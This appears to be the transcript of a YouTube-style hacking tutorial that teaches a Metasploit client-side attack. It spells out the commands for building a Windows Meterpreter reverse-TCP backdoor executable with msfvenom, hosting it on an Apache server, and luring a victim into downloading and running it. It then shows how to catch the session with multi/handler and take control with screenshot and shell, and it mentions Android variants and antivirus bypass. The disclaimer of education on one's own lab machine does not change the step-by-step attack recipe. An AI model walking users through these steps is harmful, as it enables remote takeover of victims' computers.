Hello and welcome to my channel. Before we start, I wanted to point out that everything we are gonna do in this video is just for educational purposes. Everything we are gonna do in this video is gonna be legal because we are gonna attack our own machine. Please, don't even try to use this tutorial against strangers' machines without permission, because you could end up in jail. So, let's not talk too much and start the video. All information and commands I will use in this video will be posted in the description below. We are gonna learn metasploit in this video and perform a client-side attack as an example. So, on our Kali machine, we are gonna generate an executable file and send this file to the target's machine to be able to control the target's machine. This executable file will be generated with metasploit. This file can be called also a backdoor, and it contains a payload, IP address, and a port number. The payload could be any payload that exists in metasploit. We are gonna use the Windows payload. You can use anything else like Android or Linux. The IP address should be your IP address if you are performing a reverse TCP attack. You can also use any port you like. We are gonna use the 4444 port number. Let's start now the practical part of the video. Before we start, I have to tell you that we are performing a local attack. That means that the attacker's machine and the target's machine are connected on the same network, and we are gonna use the local IP address for that. The same steps can be done also on a machine outside your network, but you have to work with your public IP address. So, public means outside the network, and local means inside the network. So that's mean now that we have to connect our Kali machine directly to the router, as we did in the last video, by changing the adapter setting to bridged adapter. Now, let's create a new folder and work inside that folder. Right click, open terminal here. To start metasploit, just type msf console, and this is the Metasploit's user interface. It tells us that it has 2251 exploit, over 1000 auxiliaries, and post, payloads, encoders, and so on. Now, if you need help finding a command in Metasploit, just type help or a question mark. You will find all commands you could need. If we want to see the options we can do with a command, like the command show, we will just type the command and then -h. Let's use now the all parameter for the show command, which will show us all modules in Metasploit. But there are a lot of modules. If we are looking for a specific module, like the reverse TCP for Windows, we will just type search reverse TCP meterpreter, and we will see all the modules. We will use in this video the number 93, Windows Meterpreter Reverse TCP. To use this module, we will just type use and the name of the module. Let's copy the name, use, and then paste. Now we are using this module. We can go a step back if we type back, and now we will try to use the module in a different way by typing use and then the number of that module, and we are using the module again as before. Let's see now the info about that module by typing info, and those are the information about the module. Now let's type show options to know what options this module needs to work on the target's machine. We will see now that it needs lhost, which is the listen IP address, your Kali machine IP address, and it needs also a port number. The default port number is okay, but we have now to set the lhost by typing set lhost and then your IP address. If you don't know your IP address, just open a new terminal, type ifconfig, and this is your IP address. Copy this and paste it here. Now press enter and the lhost has been changed. If you want to control that, just type get lhost and it will show you the new IP address you set. If we type now show options, we will see also that the lhost has been changed. This is perfect. Now let's generate the payload. We will type generate -f exe-o and then the file name, which will be stored in the same path as your terminal. Let's call it test.exe and press enter. We will see now that a new file has been generated in the folder. There is also a different method to generate this file by opening first a new terminal and then type this command msfvenom-p, then the payload name, then set the options lhost equals your IP address, lport, then -f, the file type, and then -o, the output file. If we press enter, we will see that a new file will be generated. Those both are the same file, but generated in different methods. Let's just delete this one and keep the other one. Now we have to find a method to send this file to the victim. You can do any method, for example sending by email, but I will upload this file to my Kali web server, which works just locally. I will repeat, the web server works just locally, so you can't access that through the internet, and the victim should be on the same network as you if he wants to open your web page. Now, to make the web server, I will type sudo service apache2, then start. Type the password of Kali and your web server should be started. Now if we type ifconfig again and copy our local IP address and type that now in a web browser, we will find now our Apache server. Now we want somehow to upload the payload to our web page. We will copy the file, then go to File System, var, then www, then the HTML folder. We have to open this folder as root, right click, open as root, type the Kali password, and then make a new folder. Let's name it payload, and then paste your payload in that folder. If we go back to our web page and type the IP address /payload, we will see the test.exe file there. If we extended the link now by typing /test.exe, press enter, the file will be automatically downloaded to your web browser. This is perfect. So if we copy this link and send it to the victim, the file will be automatically downloaded to his machine. Let's copy the link and go back to our terminal. Type back because we want to use a new exploit to listen to the connection with the victim. Type use exploit /multi/handler and press enter. Let's now set the payload by typing set payload and then the name of the payload we used before and press enter. If we type now show options, we will see that we need the L host. We will now set the L host, copy the IP address of Kali, and then paste that and press enter. Type show options again, and we will see that the L host has been changed. To run the payload now, we can even type exploit or type run, and metasploit will start a TCP handler on your machine. Now if we go to the victim's machine and open the browser there, paste the link we copied before, but first let's move the Windows machine on the right side and Kali on the left side to see what will happen. Let's open the browser again and paste the link again and press enter. This will download the payload automatically on the machine, but we have to run the payload to make it work. Click on run and then run, and this will open the Meterpreter session on our Kali machine. Now keep in mind that this method is working just because we are performing this attack on a Windows 7 machine, which doesn't have an antivirus to detect the file. But if you use this attack on a Windows 10 or a Windows 11, this will not work. But there are methods to bypass the antivirus. We will talk about that in a future video. Now, we have now the full control on the target's machine. Let's type first sysinfo, which will show us the information about the target's machine. And if we type now screenshot, we will see that a screenshot has been made on a target's machine and have been sent to our machine. Very cool, isn't it? If you want to see what you can do on the target's machine, just type ? and you will see all commands you can do on the target's machine. We can also access the target's command line by typing shell, and we are inside Windows command line. You can explore everything on the target's machine. Now, the client-side attack doesn't work just for Windows. It could be done for Android, macOS, Linux, and other systems too. You just have to find the right module and perform the attack on the target's machine. But the idea is the same. For example, if we want to do the attack on Android machine, we will open Metasploit, then try to find the right module, let's search for it by typing search reverse TCP Android, and you will see some payloads you can use. But as I said before, the antivirus will detect those payloads, so you have to find a method to bypass the antivirus. We will talk about some methods in future videos and will perform the attack again if this video reach someday 1,000 likes. So this was everything for this video. See you next time. Bye.